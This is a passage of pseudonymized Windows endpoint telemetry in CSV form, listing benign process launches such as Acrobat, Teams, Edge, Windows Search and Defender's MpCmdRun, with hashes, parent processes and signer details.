03:22:46.512975400+00:00,4010b65a-a83a-4cbc-b8e0-316568956950,computerpii_0a470890c60768167990033d701e7bd881398861,161450,False,10.7740.19041.1052,False,11540474045173096,,11540474045173097,2021-06-23 03:21:52.635470900+00:00,18864,2021-06-23 03:21:52.635470900+00:00,\Device\HarddiskVolume3\Windows\System32\net.exe,18864,18560,TerminateProcessStartkey,C:\Windows\System32,59904,1986-05-05 23:55:09+00:00,2019-12-07 09:09:33.990210300+00:00,2021-06-23 03:15:31.436697300+00:00,2019-12-07 09:09:33.990210300+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,net.exe,net.exe,Net Command,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,net1.exe,net1.exe,Net Command
+1476,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:11:00.066447500+00:00,13896,LogonUI.exe,"""LogonUI.exe"" /flags:0x0 /state0:0xacce4855 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.425662+00:00,13120,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-22 11:17:36.333146300+00:00,19212,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:11:00.230751600+00:00,2021-06-23 09:12:36.740184900+00:00,8fb9e337-dc55-4fc8-8593-3ea36c7ae2fd,computerpii_0a470890c60768167990033d701e7bd881398861,166045,False,10.7740.19041.1052,False,11540474045171720,,11540474045174579,2021-06-22 11:17:36.425662+00:00,13120,2021-06-22 11:17:36.425662+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,13120,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-22 11:17:36.426909300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+1477,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 06:25:38.125610+00:00,18920,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_89a8b769fb682d9bce05dc33ed55fb7039431b24.doc (002).pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.981443600+00:00,16216,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 06:25:38.251211500+00:00,2021-06-24 06:26:08.508282100+00:00,f07af032-1165-4f89-9ff2-40c4dfbb4684,computerpii_0a470890c60768167990033d701e7bd881398861,176394,False,10.7740.19041.1052,False,11540474045175171,,11540474045176874,2021-06-24 00:52:21.981443600+00:00,16216,2021-06-24 00:52:21.981443600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16216,2176,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-24 00:52:22.210767800+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,1.0,1025.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+1478,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 06:25:54.479086300+00:00,20172,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 2B3E23BD-8236-CB7F-6EDA-3762105E1FEC ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 06:25:55.213592900+00:00,2021-06-24 06:26:08.508464900+00:00,1b0f86a5-1608-4bbf-b423-9ca67df4025e,computerpii_0a470890c60768167990033d701e7bd881398861,176401,False,10.7740.19041.1052,False,11540474045145394,,11540474045176875,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1479,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:59:12.896185600+00:00,19692,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320855_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320855 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:59:13.026826900+00:00,2021-06-25 02:00:19.603756500+00:00,506be105-d798-4de4-8c11-98d5a7d712e9,computerpii_0a470890c60768167990033d701e7bd881398861,184613,False,10.7740.19041.1052,False,11540474045144190,,11540474045178928,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1480,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 02:39:18.654725800+00:00,10628,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 0420ECB8-FF47-6B73-A236-8189140EA511 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:39:19.197195900+00:00,2021-06-24 02:41:57.033252600+00:00,c712320a-8a47-487c-939b-00e3013586e6,computerpii_0a470890c60768167990033d701e7bd881398861,173526,False,10.7740.19041.1052,False,11540474045145394,,11540474045176056,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1481,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:41:00.431999500+00:00,15896,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7664 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:41:00.690165400+00:00,2021-06-24 02:41:47.520622500+00:00,fe931a83-49c1-45b2-aad7-608aa1880436,computerpii_0a470890c60768167990033d701e7bd881398861,173539,False,10.7740.19041.1052,False,11540474045175158,,11540474045176058,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+1482,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:41:03.549880900+00:00,20580,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320758_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320758 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:41:03.687804400+00:00,2021-06-24 02:41:47.521138100+00:00,3268cc45-ed70-45d7-ab7e-727eda9ce384,computerpii_0a470890c60768167990033d701e7bd881398861,173545,False,10.7740.19041.1052,False,11540474045144190,,11540474045176060,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1483,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:20:35.107772500+00:00,19340,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:20:35.142296600+00:00,2021-06-24 01:21:31.402315600+00:00,ef25ecac-ab50-423b-a53f-8a38e6c58893,computerpii_0a470890c60768167990033d701e7bd881398861,170506,False,10.7740.19041.1052,False,11540474045175219,,11540474045175586,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1484,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:20:52.245790200+00:00,20484,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:20:52.338366600+00:00,2021-06-24 01:21:31.403023400+00:00,296b5329-39ca-4e56-8d36-5d45940e8a46,computerpii_0a470890c60768167990033d701e7bd881398861,170523,False,10.7740.19041.1052,False,11540474045175158,,11540474045175587,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1485,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:20:52.951856600+00:00,1680,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:20:52.999172300+00:00,2021-06-24 01:21:31.403177700+00:00,f9af05e9-1a4b-4de7-b2c1-4f301aff0308,computerpii_0a470890c60768167990033d701e7bd881398861,170527,False,10.7740.19041.1052,False,11540474045175158,,11540474045175588,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 